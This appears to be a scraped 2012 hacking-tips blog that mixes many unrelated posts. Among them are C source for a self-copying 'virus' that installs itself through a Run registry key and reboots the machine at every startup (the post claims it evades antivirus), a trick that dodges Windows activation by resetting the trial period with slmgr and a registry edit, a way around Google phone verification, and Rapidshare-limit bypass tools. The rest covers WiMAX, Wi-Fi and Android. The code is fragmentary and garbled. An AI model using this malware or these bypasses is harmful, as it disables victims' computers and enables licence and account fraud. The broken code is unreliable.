Friday, June 8, 2012

How to use windows 7 without activation

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter

slmgr -rearm
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.

120 days using “slmgr -rearm” command before registry edit +                                                                                                                                                                
240 days using “slmgr -rearm” command after registry edit
 =      360 Days

C virus to restart computer at boot

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<dir.h> int found,drive_no;char buff[128];
void findroot()
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
found=1; //means that the system is already infected
void main()
FILE *self,*target;
if(found==0) //if the system is not already infected
self=fopen(_argv[0],”rb”); //The virus file open’s itself
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
case 2:
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
case 3:
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
case 4:
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart}
Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE

2. Goto

(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

how to compile C programs

In many of my following posts especially in the VIRUS CREATION section, I will use C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.

How to install Borland C++ compiler

1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
2. After you download, run freecommandlinetools.exe. The default installation path would be

How to configure Borland C++ compiler

1. After you install Borland C++ compier, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
Save changes and close the file. Now rename the file from New Text Document.txt tobcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
Save changes and close the file. Now rename the file from New Text Document (2).txt toilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Binand paste them.

How to compile the C source code (.C files)

1. You need to place the .C (example.c) file to be compiled in the following location
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
4. To compile the file (example.c) use the following command
Command to Compile C Program
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file). 
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

Monday, June 4, 2012

disable root in ubuntu

Re-disabling your root account

If for some reason you have enabled your root account and wish to disable it again, use the following command in terminal...
sudo passwd -dl root

enable root in ubuntu

root account

Enabling the root account

Enabling the Root account is rarely necessary. Almost everything you need to do as administrator of an Ubuntu system can be done via sudo or gksudo. If you really need a persistent Root login, the best alternative is to simulate a Root login shell using the following command...
sudo -i
To enable the Root account (i.e. set a password) use:
sudo passwd root
Use at your own risk!
Logging in to X as root may cause very serious trouble. If you believe you need a root account to perform a certain action, please consult the official support channels first, to make sure there is not a better alternative.

Sunday, June 3, 2012

make bootable pendrive

WinToFlash starts a wizard that will help pull over the contents of a windows installation CD or DVD and prep the USB drive to become a bootable replacement for the optical drive. It can also do this with your LiveCD.You don't have to worry about scratches on the disc or misplacing your original media discs once you transfer their contents to the flash drive. The optical drive is quickly becoming a thing of the past, especially in office environments, as media is shifted to the cloud.
Download Win2flash

bypass google two step verification

of all go to and sign up there. This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US.

Step 2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.

Step 3. Now click on 'I accept, create an account'.

Step 4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from

Step 5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code

Step 6. Now enter the code of your voice mail in verification code. and click OK.Your account is ready now :)

ReBOOt trailer :- upcoming hacker movie

Friday, June 1, 2012

change mac address in linux

How To Perform The Attack:
The tool we will be using is "macchanger". First you will need to install it.

apt-get install macchanger
yum install macchanger

First because we cannot change the mac address on an active card we need to run
ifconfig wlan0 down
You will leave it down until after the mac address as been changed.

To view the list of options for this tool you can run
macchanger --help
To view a list of available commands for this application.
[Image: screenshot3ij.jpg]

If you are looking to spoof a specific device you can get the prefix for the mac address from the link I provided above or by running the command
macchanger -l

So if you wanted to to spoof say a cisco device you would do
macchanger -m 00:e0:f9:52:72:f6 wlan0
Wlan0 would be the device in which your trying to spoof the mac for.
If successful we will see
[Image: screenshot5jx.jpg]
Then after this you would run
ifconfig wlan0 up

If you are not bothered about specifying your mac address as a specific device you can run
macchanger -a
Which will select a random vendor and spoof it
macchanger -r
Which won't focus on vendors and just randomly set the mac address

I hope this was informal, if you have any questions feel free to ask.

lock folder using notepad

Open Notepad from your Start -> All Programs -> Accessories -> Notepad

Step 1: Open notepad and copy and paste in this code

Step 2: Once the code in notepad save it as "FloderLock.bat"
[Image: folderlockb.png]

Step 3: You should now have a .bat file called "Folderlock" double click on it and within a second a new folder called "Locker" Should have been created. Now drop all the files you want like to lock away in "Locker"
[Image: folderlock2.png]

Step 4: When you've gotten all the files you want into lock away in "Locker" now to lock it, double click on "FolderLock.bat" and type "Y" when the command prompt comes up. Your folder will now be locked and will disappear.
[Image: folderlock3.png]

Step 5: To unlock the folder click on "FolderLock.bat' when the command prompt comes up type "Y". The folder "Locker" and all it's documents should be back in the same directory as "FolderLock"

hide files in a jpg image or a file

How to:
Hide files in a jpg

Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.

1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd “desktop” with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you’re done!

Bypass Rapidshare waiting time

Rapid Hacker v3.0 (Final) | 1.44 MB
Tested and Working - No more download limit !!! Rapid Hacker can hack / crack / bypass waiting limit at and Just copy-paste the Rapidshare link and get unlimited downloads.
Spyware and Virus Free.

? paste the rapidshare link
? click "Go"
? Click the "FREE" button on the Rapidshare's page
Just copy/paste rapidshare site and get unlimited downloads.
:: After you paste the rapidshare link, click "Go"
:: Click on the Rapidshare page, press tab 14 times
:: hit enter if you can't scroll to the free button

Download Now


Ultrasurf 8.9

"Browse the world without any limit for free with safety" New revolution in the field of proxy, simple to use and faster. No more slot limitations, time limits, geographical limits, bandwidth problems in same old proxies. Switch to UltraSurf 8.9

UltraSurf is the flagship software product from UltraReach Internet Corp. for Internet anti-censorship. It enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely.
As the safety and convenience of the users is our first priority, the most prominent features of UltraSurf 8 are that it has implemented a complex proxy with complete transparency and a high level of encryption on the Microsoft Internet Explorer (IE) platform. UltraSurf 8 enables users to browse any website freely just the same as using the regular IE browser while it automatically searches the highest speed proxy servers in the background.
UltraSurf 8 implements almost all browser functions based on HTTP and user needs, such as browsing websites, login and posting on web forums, using Web mail, uploading and downloading data files, real time audio, video and other multimedia programs, etc. Please refer to the “UltraSurf 8 Users Guide” for detailed information.
UltraSurf 8 is a green software, which means no installation process is needed nor system setting is required to change when using the software. It is simply an executable on Windows platform.

Download the UltraSurf 8 client software now


Download the UltraSurf 6 User Guide in English at:
Note: The English version is for ultrasurf 6. You may use it as the reference for current version ultrasurf 8.


Cannot be used with Firefox, so Firefox users you have to use same old proxies....

Download Install Android Emulator

In this tutorial we are going to learn how to install any given Android application in Android emulator. i will help you to setup the android 1.1 and 1.5 emulator.You must have java installed on your machine before installing the Android emulator.

Install Java from here: Go to and install to java.

If you already installed java or recently then you must know that the version of Java installed on your machine is correct or not.

Test installed java from here: Go to check whether you have correct version of java installed or not. If you fine that correct version is not installed then follow the instruction provided in page and install the correct version of java.

After completion of java installation successfully follow below steps to install the Android emulator.

Download the android emulator

Android emulator comes with Android sdk.You can download latest sdk

How to install android emulator

Downloaded android sdk will be in compressed format.Uncompressed it to the desired location [e.g. C:\Emulator]and you are done.

Android sdk commands for emulator

Launch the command prompt: Start>Run>Cmd.Locate the emulator.exe path where the android got installed, in this case go to C:\Emulator directory and navigate to tools directory e.g:C:\Emulator\Android\android-sdk-windows-1.5_r2\tools where emulator.exe is present.Navigate to tools directory path in command prompt like shown below.

Type: Emulator.exe -help and execute it. You will find the list of the useful commands related to emulator usage.

* Type: Android -h and execute it. You will find the list of the useful commands related to Android usage.

Android virtual device

Android virtual device is the emulator that we are going to create based on the specific platform of android
.E.g. Android1.1, Abdroid1.5, Android2.0 etc.

* Type: Emulator.exe -help-virtual-device and execute it for more information about android virtual device.

Setup the Android virtual device

This is the command format to create the android virtual device: android create avd -n [UserDefinedNameHere] -t [1 or 2 or 3 etc. based on which android platform you want to create]

* If you want to create android virtual device based on Android1.1 platform then type:android create avd -n MyAndroid1 -t 1
* If you want to create android virtual device based on Android1.5 platform then type:android create avd -n MyAndroid2 -t 2
* After executing one of the above command you will be prompted for the message like below to create custom hardware profile. Type no if you don't want to create custom hardware profile.

* Now after successful setup of android virtual device you will be prompted message like this depending on what platform android virtual device is created:"Created AVD 'MyAndroid1' based on Android1.1 or Created AVD 'MyAndroid2' based on Android1.5"

List of created android virtual devices

Type: Android list avd : This command will display the list of the created android virtual devices as shown in below screen shot.

Launch created android virtual device or emulator

A: Type:emulator.exe -avd [name of the emulator created] : In our case type:emulator.exe -avd MyAndroid1 or emulator.exe -avd MyAndroid2

Now you can see the emulator launched as below. Wait some time to get it initialized , ignore any error message if it appears if it is not blocking,It will also get the Internet connection automatically so you do not need to do anything to surf Internet in emulator. Now you are ready to start you application on emulator !

make bootable pendrive

WinToFlash starts a wizard that will help pull over the contents of a windows installation CD or DVD and prep the USB drive to become a bootable replacement for the optical drive. It can also do this with your LiveCD.You don't have to worry about scratches on the disc or misplacing your original media discs once you transfer their contents to the flash drive. The optical drive is quickly becoming a thing of the past, especially in office environments, as media is shifted to the cloud.
Download Win2flash

Courtesy :- Mr Rahul Tyagi

bypass Antivirus software by vikrant saini

bypass any antivirus software

Courtesy:- Mr vikrant saini

Spoof Mac address

Most people among us change their IP address and think they are anonymous on internet but one thing they forgot that they can be tracked down with MAC address which is still there non spoofed. So what to do then? Its practically impossible to change your MAC address but yes virtually its possible :). Here is a application called SMAC that can help you to spoof your MAC address to maintain your anonymity on internet.

SMAC is a powerful, yet an easy-to-use and intuitive Windows MAC Address Modifying Utility (MAC Address spoofing) which allows users to change MAC address for almost any Network Interface Cards (NIC) on the Windows VISTA, XP, 2003, and 2000 systems, regardless of whether the manufacturers allow this option or not.

SMAC does not change the hardware burned-in MAC addresses.  SMAC changes the "software based" MAC addresses, and the new MAC addresses you change will sustain from reboots.SMAC helps people to protect their privacy by hiding their real MAC Addresses in the widely available wifi Wireless Network.  SMAC also helps Network and IT Security professionals to troubleshoot network problems, test Intrusion Detection / Prevention Systems (IDS/IPS,) test Incident Response plans, build high-availability solutions, recover (MAC Address based) software licenses, and etc...

Download SMAC  

Courtesy:- Mr Rahul Tyagi.. 

How to search google via sms

Yeah, now you can also search anything, anytime, anywhere on Google without a internet connection. Google on your mobile either it’s a Smartphone or low cost phone it will help you with his SMS service. You don’t need to buy a expensive phone’s out of your budget to just surf for internet on the go.

Please follow the following step:-

1.  You have to just type your keywords (You want to search) in your phone message box (create message).

2.Then add receipt send it to 9773300000. And it will comeback you the answer within a few seconds.

3.  You will  feel like you are surfing Google on the Internet.

Note:- Service charges may/may not apply....

Script Kiddie

A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability.

Grey hats

A grey hat, in the hacking community, refers to a skilled hacker whose activities fall somewhere between white and black hat hackers on a variety of spectra. It may relate to whether they sometimes arguably act illegally, though in good will, or to show how they disclose vulnerabilities. They usually do not hack for personal gain or have malicious intentions, but may be prepared to technically commit crimes during the course of their technological exploits in order to achieve better security. Whereas white hat hackers will tend to advise companies of security exploits quietly, grey hat hackers are prone to "advise the hacker community as well as the vendors and then watch the fallout".

White Hats

The term "white hat" in Internet slang refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.[1] Ethical hacking is a term coined by IBM meant to imply a broader category than just penetration testing.White-hat hackers are also called "sneakers", red teams, or tiger teams.An explanation in simpler more understandable terms, is a hacker, who is hacking for the purpose of improving internet security.

Top 12 White Hat Hackers :-

Black Hats

A Black Hat Hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black Hat Hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black Hat Hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. They choose their targets using a two-pronged process known as the "pre-hacking stage."
These people are cyber criminals and do most of the illegal things going on the internet..

Top 10 Black-hat hackers :-

HACKER !!! ?????

An Hacker is an individual with some very good knowledge about the  compuer's Software and Hardware.

These people breakdown the security with there exceptional knowledge. There main intention is to do illegal things..

Most hackers do it for fun and to hang around ..

Thursday, May 31, 2012

WiMax -Competing Techonologies

Competing technologies

Within the marketplace, WiMAX's main competition came from existing, widely deployed wireless systems such as Universal Mobile Telecommunications System (UMTS), CDMA2000, existing Wi-Fi and mesh networking.

In the future, competition will be from the evolution of the major cellular standards to so-called 4G, high-bandwidth, low-latency, all-IP networks with voice services built on top. The worldwide move to 4G for GSM/UMTS and AMPS/TIA (including CDMA2000) is the 3GPP Long Term Evolution (LTE) effort.
The LTE Standard was finalized in December 2008, with the first commercial deployment of LTE carried out by TeliaSonera in Oslo and Stockholm in December, 2009. Since then, LTE has seen increasing adoption by mobile carriers around the world.
In some areas of the world, the wide availability of UMTS and a general desire for standardization has meant spectrum has not been allocated for WiMAX: in July 2005, the EU-wide frequency allocation for WiMAX was blocked.


Early WirelessMAN standards, the European standard HiperMAN and Korean standard WiBro were harmonized as part of WiMAX and are no longer seen as competition but as complementary. All networks now being deployed in South Korea, the home of the WiBro standard, are now WiMAX.

WiMax Associations


WiMAX Forum

The WiMAX Forum is a non profit organization formed to promote the adoption of WiMAX compatible products and services.
A major role for the organization is to certify the interoperability of WiMAX products. Those that pass conformance and interoperability testing achieve the "WiMAX Forum Certified" designation, and can display this mark on their products and marketing materials. Some vendors claim that their equipment is "WiMAX-ready", "WiMAX-compliant", or "pre-WiMAX", if they are not officially WiMAX Forum Certified.
Another role of the WiMAX Forum is to promote the spread of knowledge about WiMAX. In order to do so, it has a certified training program that is currently offered in English and French. It also offers a series of member events and endorses some industry events.

WiMAX Spectrum Owners Alliance

WiSOA was the first global organization composed exclusively of owners of WiMAX spectrum with plans to deploy WiMAX technology in those bands. WiSOA focussed on the regulation, commercialisation, and deployment of WiMAX spectrum in the 2.3–2.5 GHz and the 3.4–3.5 GHz ranges. WiSOA merged with the Wireless Broadband Alliance in April 2008.

Telecommunications Industry Association

In 2011, the Telecommunications Industry Association released three technical standards (TIA-1164, TIA-1143, and TIA-1140) that cover the air interface and core networking aspects of Wi-Max High-Rate Packet Data (HRPD) systems using a Mobile Station/Access Terminal (MS/AT) with a single transmitter.[30]

WiMax - Integration with an IP-based network

Integration with an IP-based network

The WiMAX Forum architecture
The WiMAX Forum has proposed an architecture that defines how a WiMAX network can be connected with an IP based core network, which is typically chosen by operators that serve as Internet Service Providers (ISP); Nevertheless the WiMAX BS provide seamless integration capabilities with other types of architectures as with packet switched Mobile Networks.
The WiMAX forum proposal defines a number of components, plus some of the interconnections (or reference points) between these, labeled R1 to R5 and R8:
  • SS/MS: the Subscriber Station/Mobile Station
  • ASN: the Access Service Network
  • BS: Base station, part of the ASN
  • ASN-GW: the ASN Gateway, part of the ASN
  • CSN: the Connectivity Service Network
  • HA: Home Agent, part of the CSN
  • AAA: Authentication, Authorization and Accounting Server, part of the CSN
  • NAP: a Network Access Provider
  • NSP: a Network Service Provider
It is important to note that the functional architecture can be designed into various hardware configurations rather than fixed configurations. For example, the architecture is flexible enough to allow remote/mobile stations of varying scale and functionality and Base Stations of varying size - e.g. femto, pico, and mini BS as well as macros.

WiMax Technical Info

Technical information

The IEEE 802.16 Standard

WiMAX is based upon IEEE Std 802.16e-2005, approved in December 2005. It is a supplement to the IEEE Std 802.16-2004,and so the actual standard is 802.16-2004 as amended by 802.16e-2005. Thus, these specifications need to be considered together.
IEEE 802.16e-2005 improves upon IEEE 802.16-2004 by:
  • Adding support for mobility (soft and hard handover between base stations). This is seen as one of the most important aspects of 802.16e-2005, and is the very basis of Mobile WiMAX.
  • Scaling of the Fast Fourier transform (FFT) to the channel bandwidth in order to keep the carrier spacing constant across different channel bandwidths (typically 1.25 MHz, 5 MHz, 10 MHz or 20 MHz). Constant carrier spacing results in a higher spectrum efficiency in wide channels, and a cost reduction in narrow channels. Also known as Scalable OFDMA (SOFDMA). Other bands not multiples of 1.25 MHz are defined in the standard, but because the allowed FFT subcarrier numbers are only 128, 512, 1024 and 2048, other frequency bands will not have exactly the same carrier spacing, which might not be optimal for implementations. Carrier spacing is 10.94 kHz.
  • Advanced antenna diversity schemes, and hybrid automatic repeat-request (HARQ)
  • Adaptive Antenna Systems (AAS) and MIMO technology
  • Denser sub-channelization, thereby improving indoor penetration
  • Introducing Turbo Coding and Low-Density Parity Check (LDPC)
  • Introducing downlink sub-channelization, allowing administrators to trade coverage for capacity or vice versa
  • Adding an extra QoS class for VoIP applications.
SOFDMA (used in 802.16e-2005) and OFDM256 (802.16d) are not compatible thus equipment will have to be replaced if an operator is to move to the later standard (e.g., Fixed WiMAX to Mobile WiMAX).

Physical layer

The original version of the standard on which WiMAX is based (IEEE 802.16) specified a physical layer operating in the 10 to 66 GHz range. 802.16a, updated in 2004 to 802.16-2004, added specifications for the 2 to 11 GHz range. 802.16-2004 was updated by 802.16e-2005 in 2005 and uses scalable orthogonal frequency-division multiple access(Orthogonal frequency-division multiplexing (OFDM) is a method of encoding digital data on multiple carrier frequencies. OFDM has developed into a popular scheme for wideband digital communication, whether wireless or over copper wires, used in applications such as digital television and audio broadcasting )(SOFDMA) as opposed to the fixed orthogonal frequency-division multiplexing (OFDM) version with 256 sub-carriers (of which 200 are used) in 802.16d. More advanced versions, including 802.16e, also bring multiple antenna support through MIMO (See WiMAX MIMO). This brings potential benefits in terms of coverage, self installation, power consumption, frequency re-use and bandwidth efficiency. WiMax is the most energy-efficient pre-4G technique among LTE and HSPA+.

WiMAX Terminology

WiMAX refers to interoperable implementations of the IEEE 802.16 family of wireless-networks standards ratified by the WiMAX Forum. Similarly, Wi-Fi, refers to interoperable implementations of the IEEE 802.11 Wireless LAN standards certified by the Wi-Fi Alliance. WiMAX Forum certification allows vendors to sell fixed or mobile products as WiMAX certified, thus ensuring a level of interoperability with other certified products, as long as they fit the same profile.
The original IEEE 802.16 standard (now called "Fixed WiMAX") was published in 2001. WiMAX adopted some of its technology from WiBro, a service marketed in Korea.
Mobile WiMAX (originally based on 802.16e-2005) is the revision that was deployed in many countries, and basis of future revisions such as 802.16m-2011.
WiMAX is sometimes referred to as "Wi-Fi on steroids" and can be used for a number of applications including broadband connections, cellular backhaul, hotspots, etc. It is similar to Wi-Fi but it can also permit usage at much greater distances.


WiMAX (Worldwide Interoperability for Microwave Access) is a wireless communications standard designed to provide 30 to 40 megabit-per-second data rates, with the 2011 update providing up to 1 Gbit/s for fixed stations. It is a part of a “fourth generation,” or 4G, of wireless-communication technology. WiMax far surpasses the 30-metre (100-foot) wireless range of a conventional Wi-Fi local area network (LAN), offering a metropolitan area network with a signal radius of about 50 km (30 miles). The name "WiMAX" was created by the WiMAX Forum, which was formed in June 2001 to promote conformity and interoperability of the standard. The forum describes WiMAX as "a standards-based technology enabling the delivery of last mile wireless broadband access as an alternative to cable and DSL". WiMax offers data-transfer rates that can be superior to conventional cable-modem and DSL connections, however, the bandwidth must be shared among multiple users and thus yields lower speeds in practice.

Wi-fi Health Issues

Health issues

A small percentage of Wi-Fi users have reported adverse health issues after repeat exposure and use of Wi-Fi,though there has been no publication of any effects being observable in double-blind studies. A review of studies involving 725 people that claimed electromagnetic hypersensitivity found no evidence for their claims. The ubiquity of Wi-Fi has led to calls for more research into the effects of "electronic smog".
One study speculated that "laptops (Wi-Fi mode) on the lap near the testicles may result in decreased male fertility". Another study found decreased working memory among males during Wi-Fi exposure.
The World Health Organization (WHO) says "there is no risk from low level, long-term exposure to wi-fi networks" and the United Kingdom's Health Protection Agency reports that exposure to Wi-Fi for a year results in "same amount of radiation from a 20-minute mobile phone call."
In November 2010 research results were published by Wageningen University and Research Centre, the Netherlands, which indicates that electromagnetic radiation may play a role in a deterioration in the health of trees. In a laboratory setting it appeared that portions of leaves of Ash saplings, after having been exposed for over three months to a radiation source similar to a wifi-access point, withered and died. The authors of the report noted however that further long-term tests were necessary.

Wi-Fi Hadrware

Standard devices

An embedded RouterBoard 112 withU.FL-RSMA pigtail and R52 mini PCI Wi-Fi card widely used by wireless Internet service providers (WISPs) in the Czech Republic
OSBRiDGE 3GN - 802.11n Access Point and UMTS/GSM Gateway in one device
An Atheros Wi-Fi N draft adaptor with built in Bluetooth on a Sony Vaio E series laptop
USB wireless adapter
A wireless access point (WAP) connects a group of wireless devices to an adjacent wired LAN. An access point resembles a network hub, relaying data between connected wireless devices in addition to a (usually) single connected wired device, most often an ethernet hub or switch, allowing wireless devices to communicate with other wired devices.
Wireless adapters allow devices to connect to a wireless network. These adapters connect to devices using various external or internal interconnects such as PCI, miniPCI, USB, ExpressCard, Cardbus and PC Card. As of 2010, most newer laptop computers come equipped with internal adapters. Internal cards are generally more difficult to install.
Wireless routers integrate a Wireless Access Point, ethernet switch, and internal router firmware application that provides IP routing, NAT, andDNS forwarding through an integrated WAN-interface. A wireless router allows wired and wireless ethernet LAN devices to connect to a (usually) single WAN device such as a cable modem or a DSL modem. A wireless router allows all three devices, mainly the access point and router, to be configured through one central utility. This utility is usually an integrated web server that is accessible to wired and wireless LAN clients and often optionally to WAN clients. This utility may also be an application that is run on a desktop computer, as is the case with as Apple's AirPort, which is managed with the AirPort Utility on Mac OS X and Microsoft Windows.[43]
Wireless network bridges connect a wired network to a wireless network. A bridge differs from an access point: an access point connects wireless devices to a wired network at the data-link layer. Two wireless bridges may be used to connect two wired networks over a wireless link, useful in situations where a wired connection may be unavailable, such as between two separate homes.
Wireless range-extenders or wireless repeaters can extend the range of an existing wireless network. Strategically placed range-extenders can elongate a signal area or allow for the signal area to reach around barriers such as those pertaining in L-shaped corridors. Wireless devices connected through repeaters will suffer from an increased latency for each hop. Additionally, a wireless device connected to any of the repeaters in the chain will have a throughput limited by the "weakest link" between the two nodes in the chain from which the connection originates to where the connection ends.
The security standard, Wi-Fi Protected Setup, allows embedded devices with limited graphical user interface to connect to the Internet with ease. Wi-Fi Protected Setup has 2 configurations: The Push Button configuration and the PIN configuration. These embedded devices are also called The Internet of Things and are low-power, battery-operated embedded systems. A number of Wi-Fi manufacturers design chips and modules for embedded Wi-Fi, such as GainSpan.[44]

Distance records

Distance records (using non-standard devices) include 382 km (237 mi) in June 2007, held by Ermanno Pietrosemoli and EsLaRed of Venezuela, transferring about 3 MB of data between the mountain-tops of El Águila and Platillon.[45][46] The Swedish Space Agency transferred data 420 km (260 mi), using 6 watt amplifiers to reach an overhead stratospheric balloon.

Embedded systems

Embedded serial-to-Wi-Fi module
Increasingly in the last few years (particularly as of 2007), embedded Wi-Fi modules have become available that incorporate a real-time operating system and provide a simple means of wirelessly enabling any device which has and communicates via a serial port.This allows the design of simple monitoring devices. An example is a portable ECG device monitoring a patient at home. This Wi-Fi-enabled device can communicate via the Internet.
These Wi-Fi modules are designed by OEMs so that implementers need only minimal Wi-Fi knowledge to provide Wi-Fi connectivity for their products.

Multiple access points

Increasing the number of Wi-Fi access points provides network redundancy, support for fast roaming and increased overall network-capacity by using more channels or by defining smaller cells. Wi-Fi implementations have moved toward "thin" access points, with more of the network intelligencehoused in a centralized network appliance, relegating individual access points to the role of "dumb" transceivers. Outdoor applications may use meshtopologies.